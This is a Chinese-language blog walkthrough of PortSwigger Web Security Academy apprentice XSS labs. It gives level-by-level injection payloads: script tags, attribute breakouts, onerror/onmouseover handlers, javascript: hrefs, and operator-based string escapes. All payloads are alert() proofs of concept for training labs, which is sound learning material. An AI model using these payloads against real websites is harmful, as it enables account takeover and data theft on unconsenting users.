Postswigger 靶场 XSS 通关

文章目录

PostSwigger靶场XSS通关

靶场地址:All labs | Web Security Academy (portswigger.net)

学徒:第一关

html 复制代码
<script>alert(/wuhu/)</script>

学徒:第二关

在页面上没有输入框,进入到博客中查看。

在博客的留言版中输入我们的攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

点击返回博客

成功弹框

学徒:第三关

输入攻击代码查看页面反应

html 复制代码
<script>alert(/wuhu/)</script>

发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。

构造攻击代码:

html 复制代码
"> <script>alert(/wuhu/)</script>

学徒:第四关

输入参数查看页面反应

复制代码
wuhu

页面没有任何响应,查看网页源代码

发现我们的攻击代码被传入到了一个span标签中,构造攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

页面还是没有弹窗,怀疑这里将script标签过滤了

重新构造攻击代码

html 复制代码
<img src='#' onerror='alert(/wuhu/)'>
<img src='#' onclick='alert(/wuhu/)'>

学徒:第五关

发现页面中多了一个提交反馈

进入到提交反馈页面

在message中输入构造的攻击代码

html 复制代码
<script>alert(/wuhu/)</script>

发现页面没有任何反应,查看页面提示

这里让我们更改href属性。没什么思路,查看一下页面源代码

观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。

构造我们的攻击代码

复制代码
javascript:alert(/wuhu/)

学徒:第六关

...

学徒:第七关

在输入框输入攻击代码,观察页面反应

html 复制代码
<script>alert(/wuhu/)</script>

页面将我们输入的攻击代码传递到了input标签的value参数中。

这里我们可以将value参数闭合,然后添加一个响应事件。

构造我们的攻击代码:

html 复制代码
" onmouseover = 'alert(/wuhu/)'

学徒:第八关

第八关的提示

提示我们需要提交一个评论,然后在点击评论作者名称的时候调用报警函数。

先提交一个普通的攻击代码查看页面反应。

html 复制代码
<script>alert(/wuhu/)</script>

找到了注入点位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码

html 复制代码
javascript:alert('http://')

然后点击我们的提交评论的名字即可弹框。

学徒:第九关

输入基础攻击代码,查看页面响应

html 复制代码
<script>alert(/wuhu/)</script>

查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。

那么可以使用中划线/减号,也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算。

复制代码
'-alert(666)-'

因此除了减号,其他数学运算符号和位运算符号也可以,后面绕过XSS的思路就更多了。

html 复制代码
'+alert(1)+'
'/alert(1)/'
'%alert(1)%'
'*alert(1)*'
'^alert(1)^'
'>>alert(1)>>'
'<<alert(1)<<'
'<alert(1)<'
'>alert(1)>'
'==alert(1)=='
相关推荐
Black蜡笔小新2 小时前
赋能智慧货运:视频汇聚平台EasyCVR打造货运汽车安全互联网视频监控与管理方案
网络·汽车·音视频
NewCarRen4 小时前
整合STPA、ISO 26262与SOTIF的自动驾驶安全需求推导与验证
人工智能·安全·自动驾驶·预期功能安全
芯盾时代5 小时前
低空经济网络安全体系
安全·web安全
鹿鸣天涯5 小时前
关于进一步做好网络安全等级保护有关工作的问题释疑-【二级以上系统重新备案】、【备案证明有效期三年】
网络·安全·web安全
周杰伦_Jay5 小时前
【网络核心协议全景解析】IP、TCP、UDP与HTTP(多表格深度对比)
网络·tcp/ip·udp
00后程序员张5 小时前
如何提高 IPA 安全性 多工具组合打造可复用的 iOS 加固与反编译防护体系(IPA 安全 iOS 加固 无源码混淆 Ipa Guard 实战)
android·安全·ios·小程序·uni-app·iphone·webview
小妖同学学AI5 小时前
Rust 深度解析:变量、可变性与所有权的“安全边界”
开发语言·安全·rust
duration~5 小时前
TCP 首部格式
网络·网络协议·tcp/ip
晓oi5 小时前
基于华为设备的 OSPF+MSTP+DHCP+NAT 综合网络架构实现
网络·华为
博睿谷IT99_5 小时前
华为 USG 防火墙 NAT 配置
网络·华为·acl·nat·nat 环路